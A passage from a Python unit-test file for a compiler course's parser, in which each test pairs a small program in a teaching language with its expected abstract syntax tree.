Program([VarDecl(Id('a'),[],None),VarDecl(Id('b'),[],None),VarDecl(Id('c'),[],None),FuncDecl(Id('main'),[VarDecl(Id('a'),[],None)],([VarDecl(Id('x'),[],IntLiteral(1)),VarDecl(Id('a'),[1],ArrayLiteral([IntLiteral(12),StringLiteral(\"\"\"asdf\"\"\")])),VarDecl(Id('a'),[],ArrayLiteral([IntLiteral(12),FloatLiteral(1200000.0),BooleanLiteral(True),IntLiteral(18)]))],[For(Id('i'),IntLiteral(18),BinaryOp(\"\"\"<\"\"\",Id('a'),IntLiteral(2)),BinaryOp(\"\"\"+\"\"\",BinaryOp(\"\"\"+\"\"\",Id('i'),CallExpr(Id('foo'),[])),IntLiteral(1)),([],[CallStmt(Id('something'),[]),Assign(Id('c'),BinaryOp(\"\"\"+.\"\"\",ArrayCell(Id('a'),[IntLiteral(23),ArrayCell(Id('b'),[IntLiteral(1),IntLiteral(2),Id('c')])]),IntLiteral(12)))]))]))])\n\t\tself.assertTrue(TestAST.checkASTGen(input,expect,339))\n\n\tdef test_317(self):\n\t\tinput = \"\"\"Var: a,b,c;\n Function: main\n Body:\n Var: x=1,a[1]=1;\n Var: a,b[1]={\"this\"};\n EndBody.\"\"\"\n\t\texpect = Program([VarDecl(Id('a'),[],None),VarDecl(Id('b'),[],None),VarDecl(Id('c'),[],None),FuncDecl(Id('main'),[],([VarDecl(Id('x'),[],IntLiteral(1)),VarDecl(Id('a'),[1],IntLiteral(1)),VarDecl(Id('a'),[],None),VarDecl(Id('b'),[1],ArrayLiteral([StringLiteral(\"\"\"this\"\"\")]))],[]))])\n\t\tself.assertTrue(TestAST.checkASTGen(input,expect,317))\n\n\tdef test_390(self):\n\t\tinput = \"\"\"Var: a,b,c;\nFunction: 
main\nParameter: a\nBody:\nfoo(1+a, b, c)[something][whatever] = 12;\nEndBody.\"\"\"\n\t\texpect = Program([VarDecl(Id('a'),[],None),VarDecl(Id('b'),[],None),VarDecl(Id('c'),[],None),FuncDecl(Id('main'),[VarDecl(Id('a'),[],None)],([],[Assign(ArrayCell(CallExpr(Id('foo'),[BinaryOp(\"\"\"+\"\"\",IntLiteral(1),Id('a')),Id('b'),Id('c')]),[Id('something'),Id('whatever')]),IntLiteral(12))]))])\n\t\tself.assertTrue(TestAST.checkASTGen(input,expect,390))\n\n\tdef test_330(self):\n\t\tinput = \"\"\"Var: a,b,c;\n Function: main\n Parameter: a\n Body:\n Var: x=1,a[1]={12, \"asdf\"},a={12,12.e5,True,0x12};\n If a == True Then\n EndIf.\n EndBody.\"\"\"\n\t\texpect = Program([VarDecl(Id('a'),[],None),VarDecl(Id('b'),[],None),VarDecl(Id('c'),[],None),FuncDecl(Id('main'),[VarDecl(Id('a'),[],None)],([VarDecl(Id('x'),[],IntLiteral(1)),VarDecl(Id('a'),[1],ArrayLiteral([IntLiteral(12),StringLiteral(\"\"\"asdf\"\"\")])),VarDecl(Id('a'),[],ArrayLiteral([IntLiteral(12),FloatLiteral(1200000.0),BooleanLiteral(True),IntLiteral(18)]))],[If([(BinaryOp(\"\"\"==\"\"\",Id('a'),BooleanLiteral(True)),[],[])],[])]))])\n\t\tself.assertTrue(TestAST.checkASTGen(input,expect,330))\n\n\tdef test_318(self):\n\t\tinput = \"\"\"Var: a,b,c;\n Function: main\n Parameter: a\n Body:\n Var: x=1,a[1]=1;\n Var: a,b[1]={\"this\"};\n EndBody.\"\"\"\n\t\texpect = Program([VarDecl(Id('a'),[],None),VarDecl(Id('b'),[],None),VarDecl(Id('c'),[],None),FuncDecl(Id('main'),[VarDecl(Id('a'),[],None)],([VarDecl(Id('x'),[],IntLiteral(1)),VarDecl(Id('a'),[1],IntLiteral(1)),VarDecl(Id('a'),[],None),VarDecl(Id('b'),[1],ArrayLiteral([StringLiteral(\"\"\"this\"\"\")]))],[]))])\n\t\tself.assertTrue(TestAST.checkASTGen(input,expect,318))\n\n\tdef test_345(self):\n\t\tinput = \"\"\"Var: a,b,c;\n Function: main\n Parameter: a\n Body:\n Do something(); While !(abc < 12 || b && True) EndDo.\n EndBody.\"\"\"\n\t\texpect = 
Program([VarDecl(Id('a'),[],None),VarDecl(Id('b'),[],None),VarDecl(Id('c'),[],None),FuncDecl(Id('main'),[VarDecl(Id('a'),[],None)],([],[Dowhile(([],[CallStmt(Id('something'),[])]),UnaryOp(\"\"\"!\"\"\",BinaryOp(\"\"\"<\"\"\",Id('abc'),BinaryOp(\"\"\"&&\"\"\",BinaryOp(\"\"\"||\"\"\",IntLiteral(12),Id('b')),BooleanLiteral(True)))))]))])\n\t\tself.assertTrue(TestAST.checkASTGen(input,expect,345))\n\n\tdef test_358(self):\n\t\tinput = \"\"\"Var: a,b,c;\n Function: main\n Body:\n foo(arg1, \"???\", foo(nothing));\n EndBody.\"\"\"\n\t\texpect = Program([VarDecl(Id('a'),[],None),VarDecl(Id('b'),[],None),VarDecl(Id('c'),[],None),FuncDecl(Id('main'),[],([],[CallStmt(Id('foo'),[Id('arg1'),StringLiteral(\"\"\"???\"\"\"),CallExpr(Id('foo'),[Id('nothing')])])]))])\n\t\tself.assertTrue(TestAST.checkASTGen(input,expect,358))\n\n\tdef test_310(self):\n\t\tinput = \"\"\"Var:x[1] = {1,2,3,4};\"\"\"\n\t\texpect = Program([VarDecl(Id('x'),[1],ArrayLiteral([IntLiteral(1),IntLiteral(2),IntLiteral(3),IntLiteral(4)]))])\n\t\tself.assertTrue(TestAST.checkASTGen(input,expect,310))\n\n\tdef test_322(self):\n\t\tinput = \"\"\"Function: main\n Parameter: a\n Body:\n If 1 Then\n EndIf.\n EndBody.\"\"\"\n\t\texpect = Program([FuncDecl(Id('main'),[VarDecl(Id('a'),[],None)],([],[If([(IntLiteral(1),[],[])],[])]))])\n\t\tself.assertTrue(TestAST.checkASTGen(input,expect,322))\n\n\tdef test_369(self):\n\t\tinput = \"\"\"Var: a,b,c;\n Function: main\n Body:\n a = b[something()[a[1]] + 1][c + d < 1];\n EndBody.\"\"\"\n\t\texpect = Program([VarDecl(Id('a'),[],None),VarDecl(Id('b'),[],None),VarDecl(Id('c'),[],None),FuncDecl(Id('main'),[],([],[Assign(Id('a'),ArrayCell(Id('b'),[BinaryOp(\"\"\"+\"\"\",ArrayCell(CallExpr(Id('something'),[]),[ArrayCell(Id('a'),[IntLiteral(1)])]),IntLiteral(1)),BinaryOp(\"\"\"<\"\"\",BinaryOp(\"\"\"+\"\"\",Id('c'),Id('d')),IntLiteral(1))]))]))])\n\t\tself.assertTrue(TestAST.checkASTGen(input,expect,369))\n\n\tdef test_325(self):\n\t\tinput = \"\"\"Var: a,b,c;\nFunction: 
main\nParameter: a\nBody:\nVar: x=1,a[1]=1;\nVar: a,b[1]={\"this\"};\nEndBody.\"\"\"\n\t\texpect = Program([VarDecl(Id('a'),[],None),VarDecl(Id('b'),[],None),VarDecl(Id('c'),[],None),FuncDecl(Id('main'),[VarDecl(Id('a'),[],None)],([VarDecl(Id('x'),[],IntLiteral(1)),VarDecl(Id('a'),[1],IntLiteral(1)),VarDecl(Id('a'),[],None),VarDecl(Id('b'),[1],ArrayLiteral([StringLiteral(\"\"\"this\"\"\")]))],[]))])\n\t\tself.assertTrue(TestAST.checkASTGen(input,expect,325))\n\n\tdef test_378(self):\n\t\tinput = \"\"\"Var: a,b,c;\nFunction: main\nParameter: a, bn\nBody:\nReturn a + bn - a[foo()];\nEndBody.\"\"\"\n\t\texpect = Program([VarDecl(Id('a'),[],None),VarDecl(Id('b'),[],None),VarDecl(Id('c'),[],None),FuncDecl(Id('main'),[VarDecl(Id('a'),[],None),VarDecl(Id('bn'),[],None)],([],[Return(BinaryOp(\"\"\"-\"\"\",BinaryOp(\"\"\"+\"\"\",Id('a'),Id('bn')),ArrayCell(Id('a'),[CallExpr(Id('foo'),[])])))]))])\n\t\tself.assertTrue(TestAST.checkASTGen(input,expect,378))\n\n\tdef test_315(self):\n\t\tinput = \"\"\"Var: a,b,c;\nFunction: main\nBody:\na = a <b - c;\nEndBody.\"\"\"\n\t\texpect = Program([VarDecl(Id('a'),[],None),VarDecl(Id('b'),[],None),VarDecl(Id('c'),[],None),FuncDecl(Id('main'),[],([],[Assign(Id('a'),BinaryOp(\"\"\"<\"\"\",Id('a'),BinaryOp(\"\"\"-\"\"\",Id('b'),Id('c'))))]))])\n\t\tself.assertTrue(TestAST.checkASTGen(input,expect,315))\n\n\tdef test_375(self):\n\t\tinput = \"\"\"Var: a,b,c;\n Function: main\n Body:\n b = {{{}}};\n a = (a + b) +. 
(a-a-.a*a*.a\\.b%!c&&a||a==b);\n EndBody.\"\"\"\n\t\texpect = Program([VarDecl(Id('a'),[],None),VarDecl(Id('b'),[],None),VarDecl(Id('c'),[],None),FuncDecl(Id('main'),[],([],[Assign(Id('b'),ArrayLiteral([ArrayLiteral([ArrayLiteral([])])])),Assign(Id('a'),BinaryOp(\"\"\"+.\"\"\",BinaryOp(\"\"\"+\"\"\",Id('a'),Id('b')),BinaryOp(\"\"\"==\"\"\",BinaryOp(\"\"\"||\"\"\",BinaryOp(\"\"\"&&\"\"\",BinaryOp(\"\"\"-.\"\"\",BinaryOp(\"\"\"-\"\"\",Id('a'),Id('a')),BinaryOp(\"\"\"%\"\"\",BinaryOp(\"\"\"\\.\"\"\",BinaryOp(\"\"\"*.\"\"\",BinaryOp(\"\"\"*\"\"\",Id('a'),Id('a')),Id('a')),Id('b')),UnaryOp(\"\"\"!\"\"\",Id('c')))),Id('a')),Id('a')),Id('b'))))]))])\n\t\tself.assertTrue(TestAST.checkASTGen(input,expect,375))\n\n\tdef test_400(self):\n\t\tinput = \"\"\"Var: a,b,c;\nFunction: main\nParameter: a, a[1][12]\nBody:\nFor(i=expr, a =/= {{}}, \"what is that'\"\" + 1) Do\nBreak;Continue;\nEndFor.\nEndBody.\"\"\"\n\t\texpect = Program([VarDecl(Id('a'),[],None),VarDecl(Id('b'),[],None),VarDecl(Id('c'),[],None),FuncDecl(Id('main'),[VarDecl(Id('a'),[],None),VarDecl(Id('a'),[1,12],None)],([],[For(Id('i'),Id('expr'),BinaryOp(\"\"\"=/=\"\"\",Id('a'),ArrayLiteral([ArrayLiteral([])])),BinaryOp(\"\"\"+\"\"\",StringLiteral(\"\"\"what is that'\\\"\"\"\"),IntLiteral(1)),([],[Break(),Continue()]))]))])\n\t\tself.assertTrue(TestAST.checkASTGen(input,expect,400))\n\n\tdef test_388(self):\n\t\tinput = \"\"\"Var: a,b,c;\nFunction: main\nParameter: a\nBody:\nWhile statement Do something(); EndWhile.\nEndBody.\"\"\"\n\t\texpect = Program([VarDecl(Id('a'),[],None),VarDecl(Id('b'),[],None),VarDecl(Id('c'),[],None),FuncDecl(Id('main'),[VarDecl(Id('a'),[],None)],([],[While(Id('statement'),([],[CallStmt(Id('something'),[])]))]))])\n\t\tself.assertTrue(TestAST.checkASTGen(input,expect,388))\n\n\tdef test_379(self):\n\t\tinput = \"\"\"Function: main\nParameter: a\nBody:\na[1] = b[1] + {1,2,3} + append();\nEndBody.\"\"\"\n\t\texpect = 
Program([FuncDecl(Id('main'),[VarDecl(Id('a'),[],None)],([],[Assign(ArrayCell(Id('a'),[IntLiteral(1)]),BinaryOp(\"\"\"+\"\"\",BinaryOp(\"\"\"+\"\"\",ArrayCell(Id('b'),[IntLiteral(1)]),ArrayLiteral([IntLiteral(1),IntLiteral(2),IntLiteral(3)])),CallExpr(Id('append'),[])))]))])\n\t\tself.assertTrue(TestAST.checkASTGen(input,expect,379))\n\n\tdef test_373(self):\n\t\tinput = \"\"\"Var: a,b,c;\nFunction: main\nBody:\na = a + b +. a-a-.a*a*.a\\.b%!c&&a||a==b;\nEndBody.\"\"\"\n\t\texpect = Program([VarDecl(Id('a'),[],None),VarDecl(Id('b'),[],None),VarDecl(Id('c'),[],None),FuncDecl(Id('main'),[],([],[Assign(Id('a'),BinaryOp(\"\"\"==\"\"\",BinaryOp(\"\"\"||\"\"\",BinaryOp(\"\"\"&&\"\"\",BinaryOp(\"\"\"-.\"\"\",BinaryOp(\"\"\"-\"\"\",BinaryOp(\"\"\"+.\"\"\",BinaryOp(\"\"\"+\"\"\",Id('a'),Id('b')),Id('a')),Id('a')),BinaryOp(\"\"\"%\"\"\",BinaryOp(\"\"\"\\.\"\"\",BinaryOp(\"\"\"*.\"\"\",BinaryOp(\"\"\"*\"\"\",Id('a'),Id('a')),Id('a')),Id('b')),UnaryOp(\"\"\"!\"\"\",Id('c')))),Id('a')),Id('a')),Id('b')))]))])\n\t\tself.assertTrue(TestAST.checkASTGen(input,expect,373))\n\n\tdef test_327(self):\n\t\tinput = \"\"\"Var: a,b,c;\n Function: main\n Parameter: a\n Body:\n Var: x=1,a[1]={12, \"asdf\"},a={12,12.e5,True,0x12};\n Var: a,b[1]={\"this\"};\n EndBody.\"\"\"\n\t\texpect = Program([VarDecl(Id('a'),[],None),VarDecl(Id('b'),[],None),VarDecl(Id('c'),[],None),FuncDecl(Id('main'),[VarDecl(Id('a'),[],None)],([VarDecl(Id('x'),[],IntLiteral(1)),VarDecl(Id('a'),[1],ArrayLiteral([IntLiteral(12),StringLiteral(\"\"\"asdf\"\"\")])),VarDecl(Id('a'),[],ArrayLiteral([IntLiteral(12),FloatLiteral(1200000.0),BooleanLiteral(True),IntLiteral(18)])),VarDecl(Id('a'),[],None),VarDecl(Id('b'),[1],ArrayLiteral([StringLiteral(\"\"\"this\"\"\")]))],[]))])\n\t\tself.assertTrue(TestAST.checkASTGen(input,expect,327))\n\n\tdef test_398(self):\n\t\tinput = \"\"\"Var: a,b,c;\n Function: main\n Parameter: a, a[1][12]\n Body:\n For(i=expr, a =/= {{}}, \"what is that\" + 1) Do\n EndFor.\n EndBody.\"\"\"\n\t\texpect 
= Program([VarDecl(Id('a'),[],None),VarDecl(Id('b'),[],None),VarDecl(Id('c'),[],None),FuncDecl(Id('main'),[VarDecl(Id('a'),[],None),VarDecl(Id('a'),[1,12],None)],([],[For(Id('i'),Id('expr'),BinaryOp(\"\"\"=/=\"\"\",Id('a'),ArrayLiteral([ArrayLiteral([])])),BinaryOp(\"\"\"+\"\"\",StringLiteral(\"\"\"what is that\"\"\"),IntLiteral(1)),([],[]))]))])\n\t\tself.assertTrue(TestAST.checkASTGen(input,expect,398))\n\n\tdef test_332(self):\n\t\tinput = \"\"\"Function: main\n Parameter: a\n Body:\n (1 + c)[foo() + 1][1 + 2][a + v] = a;\n EndBody.\"\"\"\n\t\texpect = Program([FuncDecl(Id('main'),[VarDecl(Id('a'),[],None)],([],[Assign(ArrayCell(BinaryOp(\"\"\"+\"\"\",IntLiteral(1),Id('c')),[BinaryOp(\"\"\"+\"\"\",CallExpr(Id('foo'),[]),IntLiteral(1)),BinaryOp(\"\"\"+\"\"\",IntLiteral(1),IntLiteral(2)),BinaryOp(\"\"\"+\"\"\",Id('a'),Id('v'))]),Id('a'))]))])\n\t\tself.assertTrue(TestAST.checkASTGen(input,expect,332))\n\n\tdef test_308(self):\n\t\tinput = \"\"\"Var: x, y[1][3]={{{12,1}, {12., 12e3}},{23}, {13,32}};\nFunction: fact\nParameter: n\nBody:\nIf n == 0 Then\nReturn 1;\nElse\nReturn n * fact(n-1);\nEndIf.\nEndBody.\nFunction: main\n** this is a comment **\nBody:\nx = 10;\nfact (x);\nEndBody.\"\"\"\n\t\texpect = Program([VarDecl(Id('x'),[],None),VarDecl(Id('y'),[1,3],ArrayLiteral([ArrayLiteral([ArrayLiteral([IntLiteral(12),IntLiteral(1)]),ArrayLiteral([FloatLiteral(12.0),FloatLiteral(12000.0)])]),ArrayLiteral([IntLiteral(23)]),ArrayLiteral([IntLiteral(13),IntLiteral(32)])])),FuncDecl(Id('fact'),[VarDecl(Id('n'),[],None)],([],[If([(BinaryOp(\"\"\"==\"\"\",Id('n'),IntLiteral(0)),[],[Return(IntLiteral(1))])],([],[Return(BinaryOp(\"\"\"*\"\"\",Id('n'),CallExpr(Id('fact'),[BinaryOp(\"\"\"-\"\"\",Id('n'),IntLiteral(1))])))]))])),FuncDecl(Id('main'),[],([],[Assign(Id('x'),IntLiteral(10)),CallStmt(Id('fact'),[Id('x')])]))])\n\t\tself.assertTrue(TestAST.checkASTGen(input,expect,308))\n\n\tdef test_347(self):\n\t\tinput = \"\"\"Var: a,b,c;\n Function: main\n Parameter: a\n Body:\n 
Do something(); While 1 <. 2.0 EndDo.\n EndBody.\"\"\"\n\t\texpect = Program([VarDecl(Id('a'),[],None),VarDecl(Id('b'),[],None),VarDecl(Id('c'),[],None),FuncDecl(Id('main'),[VarDecl(Id('a'),[],None)],([],[Dowhile(([],[CallStmt(Id('something'),[])]),BinaryOp(\"\"\"<.\"\"\",IntLiteral(1),FloatLiteral(2.0)))]))])\n\t\tself.assertTrue(TestAST.checkASTGen(input,expect,347))\n\n\tdef test_377(self):\n\t\tinput = \"\"\"Var: a,b,c;\nFunction: main\nBody:\n\nEndBody.\nFunction: foo\nBody:\nmain();\nIf a[1] Then foo(); EndIf.\nEndBody.\"\"\"\n\t\texpect = Program([VarDecl(Id('a'),[],None),VarDecl(Id('b'),[],None),VarDecl(Id('c'),[],None),FuncDecl(Id('main'),[],([],[])),FuncDecl(Id('foo'),[],([],[CallStmt(Id('main'),[]),If([(ArrayCell(Id('a'),[IntLiteral(1)]),[],[CallStmt(Id('foo'),[])])],[])]))])\n\t\tself.assertTrue(TestAST.checkASTGen(input,expect,377))\n\n\tdef test_349(self):\n\t\tinput = \"\"\"Var: a,b,c;\n Function: main\n Parameter: a\n Body:\n Do something(); While a && b <. 1. +. 3. EndDo.\n EndBody.\"\"\"\n\t\texpect = Program([VarDecl(Id('a'),[],None),VarDecl(Id('b'),[],None),VarDecl(Id('c'),[],None),FuncDecl(Id('main'),[VarDecl(Id('a'),[],None)],([],[Dowhile(([],[CallStmt(Id('something'),[])]),BinaryOp(\"\"\"<.\"\"\",BinaryOp(\"\"\"&&\"\"\",Id('a'),Id('b')),BinaryOp(\"\"\"+.\"\"\",FloatLiteral(1.0),FloatLiteral(3.0))))]))])\n\t\tself.assertTrue(TestAST.checkASTGen(input,expect,349))\n\n\tdef test_367(self):\n\t\tinput = \"\"\"Var: a,b,c;\nFunction: main\nBody:\nfoo(a < b + c);\nprintLn();\na = 1+ 2+2+{1, 2,3};\n**print(arg);\nprintStrLn(arg)**\nread();\nEndBody.\"\"\"\n\t\texpect = 
Program([VarDecl(Id('a'),[],None),VarDecl(Id('b'),[],None),VarDecl(Id('c'),[],None),FuncDecl(Id('main'),[],([],[CallStmt(Id('foo'),[BinaryOp(\"\"\"<\"\"\",Id('a'),BinaryOp(\"\"\"+\"\"\",Id('b'),Id('c')))]),CallStmt(Id('printLn'),[]),Assign(Id('a'),BinaryOp(\"\"\"+\"\"\",BinaryOp(\"\"\"+\"\"\",BinaryOp(\"\"\"+\"\"\",IntLiteral(1),IntLiteral(2)),IntLiteral(2)),ArrayLiteral([IntLiteral(1),IntLiteral(2),IntLiteral(3)]))),CallStmt(Id('read'),[])]))])\n\t\tself.assertTrue(TestAST.checkASTGen(input,expect,367))\n\n\tdef test_401(self):\n\t\tinput = \"\"\"Function: main\nBody:\nFor (i = 0x12, a < 2, i + foo((foo()[1 + a[1 + 2]])) + 1) Do something(); EndFor.\nEndBody.\"\"\"\n\t\texpect = Program([FuncDecl(Id('main'),[],([],[For(Id('i'),IntLiteral(18),BinaryOp(\"\"\"<\"\"\",Id('a'),IntLiteral(2)),BinaryOp(\"\"\"+\"\"\",BinaryOp(\"\"\"+\"\"\",Id('i'),CallExpr(Id('foo'),[ArrayCell(CallExpr(Id('foo'),[]),[BinaryOp(\"\"\"+\"\"\",IntLiteral(1),ArrayCell(Id('a'),[BinaryOp(\"\"\"+\"\"\",IntLiteral(1),IntLiteral(2))]))])])),IntLiteral(1)),([],[CallStmt(Id('something'),[])]))]))])\n\t\tself.assertTrue(TestAST.checkASTGen(input,expect,401))\n\n\tdef test_319(self):\n\t\tinput = \"\"\"Var: a,b,c;\n Function: main\n Parameter: a, b[1]\n Body:\n Var: x=1,a[1]=1;\n Var: a,b[1]={\"this\"};\n EndBody.\"\"\"\n\t\texpect = Program([VarDecl(Id('a'),[],None),VarDecl(Id('b'),[],None),VarDecl(Id('c'),[],None),FuncDecl(Id('main'),[VarDecl(Id('a'),[],None),VarDecl(Id('b'),[1],None)],([VarDecl(Id('x'),[],IntLiteral(1)),VarDecl(Id('a'),[1],IntLiteral(1)),VarDecl(Id('a'),[],None),VarDecl(Id('b'),[1],ArrayLiteral([StringLiteral(\"\"\"this\"\"\")]))],[]))])\n\t\tself.assertTrue(TestAST.checkASTGen(input,expect,319))\n\n\tdef test_337(self):\n\t\tinput = \"\"\"Var: a,b,c;\nFunction: main\nParameter: a\nBody:\nVar: x=1,a[1]={12, \"asdf\"},a={12,12.e5,True,0x12};\nFor (i = 2, a < 2, i + 1) Do \nFor (i=2, a>1341,a+b) Do EndFor.\nsomething(); EndFor.\nEndBody.\"\"\"\n\t\texpect = 
Program([VarDecl(Id('a'),[],None),VarDecl(Id('b'),[],None),VarDecl(Id('c'),[],None),FuncDecl(Id('main'),[VarDecl(Id('a'),[],None)],([VarDecl(Id('x'),[],IntLiteral(1)),VarDecl(Id('a'),[1],ArrayLiteral([IntLiteral(12),StringLiteral(\"\"\"asdf\"\"\")])),VarDecl(Id('a'),[],ArrayLiteral([IntLiteral(12),FloatLiteral(1200000.0),BooleanLiteral(True),IntLiteral(18)]))],[For(Id('i'),IntLiteral(2),BinaryOp(\"\"\"<\"\"\",Id('a'),IntLiteral(2)),BinaryOp(\"\"\"+\"\"\",Id('i'),IntLiteral(1)),([],[For(Id('i'),IntLiteral(2),BinaryOp(\"\"\">\"\"\",Id('a'),IntLiteral(1341)),BinaryOp(\"\"\"+\"\"\",Id('a'),Id('b')),([],[])),CallStmt(Id('something'),[])]))]))])\n\t\tself.assertTrue(TestAST.checkASTGen(input,expect,337))\n\n\tdef test_324(self):\n\t\tinput = \"\"\"Var: a,b,c;\nFunction: main\nParameter: a, b[1]\nBody:\nVar: x=1,a[1]=1;\nIf a Then\nEndIf.\nEndBody.\"\"\"\n\t\texpect = Program([VarDecl(Id('a'),[],None),VarDecl(Id('b'),[],None),VarDecl(Id('c'),[],None),FuncDecl(Id('main'),[VarDecl(Id('a'),[],None),VarDecl(Id('b'),[1],None)],([VarDecl(Id('x'),[],IntLiteral(1)),VarDecl(Id('a'),[1],IntLiteral(1))],[If([(Id('a'),[],[])],[])]))])\n\t\tself.assertTrue(TestAST.checkASTGen(input,expect,324))\n\n\tdef test_356(self):\n\t\tinput = \"\"\"Var: a,b,c;\n Function: main\n Body:\n If !(True) Then\n \n a = a <c;\n If (a + b > c) Then a = a+b; ElseIf a == b Then writeln(i); Else a = 12.e1; EndIf.\n EndIf.\n Return a < 1 || foo(arg1, \"arg2\", {1,2});\n EndBody.\"\"\"\n\t\texpect = 
Program([VarDecl(Id('a'),[],None),VarDecl(Id('b'),[],None),VarDecl(Id('c'),[],None),FuncDecl(Id('main'),[],([],[If([(UnaryOp(\"\"\"!\"\"\",BooleanLiteral(True)),[],[Assign(Id('a'),BinaryOp(\"\"\"<\"\"\",Id('a'),Id('c'))),If([(BinaryOp(\"\"\">\"\"\",BinaryOp(\"\"\"+\"\"\",Id('a'),Id('b')),Id('c')),[],[Assign(Id('a'),BinaryOp(\"\"\"+\"\"\",Id('a'),Id('b')))]),(BinaryOp(\"\"\"==\"\"\",Id('a'),Id('b')),[],[CallStmt(Id('writeln'),[Id('i')])])],([],[Assign(Id('a'),FloatLiteral(120.0))]))])],[]),Return(BinaryOp(\"\"\"<\"\"\",Id('a'),BinaryOp(\"\"\"||\"\"\",IntLiteral(1),CallExpr(Id('foo'),[Id('arg1'),StringLiteral(\"\"\"arg2\"\"\"),ArrayLiteral([IntLiteral(1),IntLiteral(2)])]))))]))])\n\t\tself.assertTrue(TestAST.checkASTGen(input,expect,356))\n\n\tdef test_306(self):\n\t\tinput = \"\"\"Var: b[2][3]={{1,2},{3,4}};\nFunction: main\nBody:\nReturn;\nEndBody.\"\"\"\n\t\texpect = Program([VarDecl(Id('b'),[2,3],ArrayLiteral([ArrayLiteral([IntLiteral(1),IntLiteral(2)]),ArrayLiteral([IntLiteral(3),IntLiteral(4)])])),FuncDecl(Id('main'),[],([],[Return(None)]))])\n\t\tself.assertTrue(TestAST.checkASTGen(input,expect,306))\n\n\tdef test_362(self):\n\t\tinput = \"\"\"Var: a,b,c;\nFunction: main\nBody:\nfoo(arg1, \"???\", foo(nothing))[1] = something(foo());\nEndBody.\"\"\"\n\t\texpect = Program([VarDecl(Id('a'),[],None),VarDecl(Id('b'),[],None),VarDecl(Id('c'),[],None),FuncDecl(Id('main'),[],([],[Assign(ArrayCell(CallExpr(Id('foo'),[Id('arg1'),StringLiteral(\"\"\"???\"\"\"),CallExpr(Id('foo'),[Id('nothing')])]),[IntLiteral(1)]),CallExpr(Id('something'),[CallExpr(Id('foo'),[])]))]))])\n\t\tself.assertTrue(TestAST.checkASTGen(input,expect,362))\n\n\tdef test_380(self):\n\t\tinput = \"\"\"\n Function: main\n Parameter: a, b[1][100]\n Body:\n While a<b Do\n If a > b Then doNothing(); Break;\n ElseIf !somecon() Then doSomething();\n Else Do something(); While a + foo()[100] EndDo.\n EndIf.\n EndWhile.\n EndBody.\"\"\"\n\t\texpect = 
Program([FuncDecl(Id('main'),[VarDecl(Id('a'),[],None),VarDecl(Id('b'),[1,100],None)],([],[While(BinaryOp(\"\"\"<\"\"\",Id('a'),Id('b')),([],[If([(BinaryOp(\"\"\">\"\"\",Id('a'),Id('b')),[],[CallStmt(Id('doNothing'),[]),Break()]),(UnaryOp(\"\"\"!\"\"\",CallExpr(Id('somecon'),[])),[],[CallStmt(Id('doSomething'),[])])],([],[Dowhile(([],[CallStmt(Id('something'),[])]),BinaryOp(\"\"\"+\"\"\",Id('a'),ArrayCell(CallExpr(Id('foo'),[]),[IntLiteral(100)])))]))]))]))])\n\t\tself.assertTrue(TestAST.checkASTGen(input,expect,380))\n\n\tdef test_370(self):\n\t\tinput = \"\"\"Var: a,b,c;\n Function: main\n Body:\n a = b[something()[a[1]] + 1][c + d < 1] + c *. d[1][21];\n EndBody.\"\"\"\n\t\texpect = Program([VarDecl(Id('a'),[],None),VarDecl(Id('b'),[],None),VarDecl(Id('c'),[],None),FuncDecl(Id('main'),[],([],[Assign(Id('a'),BinaryOp(\"\"\"+\"\"\",ArrayCell(Id('b'),[BinaryOp(\"\"\"+\"\"\",ArrayCell(CallExpr(Id('something'),[]),[ArrayCell(Id('a'),[IntLiteral(1)])]),IntLiteral(1)),BinaryOp(\"\"\"<\"\"\",BinaryOp(\"\"\"+\"\"\",Id('c'),Id('d')),IntLiteral(1))]),BinaryOp(\"\"\"*.\"\"\",Id('c'),ArrayCell(Id('d'),[IntLiteral(1),IntLiteral(21)]))))]))])\n\t\tself.assertTrue(TestAST.checkASTGen(input,expect,370))\n\n\tdef test_392(self):\n\t\tinput = \"\"\"Var: a,b,c;\n Function: main\n Parameter: a\n Body:\n a[3 + foo(2)] = a[b[2][3]] \\. 
-.4;\n EndBody.\"\"\"\n\t\texpect = Program([VarDecl(Id('a'),[],None),VarDecl(Id('b'),[],None),VarDecl(Id('c'),[],None),FuncDecl(Id('main'),[VarDecl(Id('a'),[],None)],([],[Assign(ArrayCell(Id('a'),[BinaryOp(\"\"\"+\"\"\",IntLiteral(3),CallExpr(Id('foo'),[IntLiteral(2)]))]),BinaryOp(\"\"\"\\.\"\"\",ArrayCell(Id('a'),[ArrayCell(Id('b'),[IntLiteral(2),IntLiteral(3)])]),UnaryOp(\"\"\"-.\"\"\",IntLiteral(4))))]))])\n\t\tself.assertTrue(TestAST.checkASTGen(input,expect,392))\n\n\tdef test_354(self):\n\t\tinput = \"\"\"Var: a,b,c;\n Function: main\n Body:\n If !(True) Then\n \n a = a <c;\n If (a + b > c) Then a = a+b; ElseIf a == b Then writeln(i); Else a = 12.e1; EndIf.\n EndIf.\n Return 1 + {{1,2}, \"abnd\"};\n EndBody.\"\"\"\n\t\texpect = Program([VarDecl(Id('a'),[],None),VarDecl(Id('b'),[],None),VarDecl(Id('c'),[],None),FuncDecl(Id('main'),[],([],[If([(UnaryOp(\"\"\"!\"\"\",BooleanLiteral(True)),[],[Assign(Id('a'),BinaryOp(\"\"\"<\"\"\",Id('a'),Id('c'))),If([(BinaryOp(\"\"\">\"\"\",BinaryOp(\"\"\"+\"\"\",Id('a'),Id('b')),Id('c')),[],[Assign(Id('a'),BinaryOp(\"\"\"+\"\"\",Id('a'),Id('b')))]),(BinaryOp(\"\"\"==\"\"\",Id('a'),Id('b')),[],[CallStmt(Id('writeln'),[Id('i')])])],([],[Assign(Id('a'),FloatLiteral(120.0))]))])],[]),Return(BinaryOp(\"\"\"+\"\"\",IntLiteral(1),ArrayLiteral([ArrayLiteral([IntLiteral(1),IntLiteral(2)]),StringLiteral(\"\"\"abnd\"\"\")])))]))])\n\t\tself.assertTrue(TestAST.checkASTGen(input,expect,354))\n\n\tdef test_340(self):\n\t\tinput = \"\"\"Var: a,b,c;\n Function: main\n Parameter: a\n Body:\n Var: x=1,a[1]={12, \"asdf\"},a={12,12.e5,True,0x12};\n While 1 Do something(); EndWhile.\n EndBody.\"\"\"\n\t\texpect = 
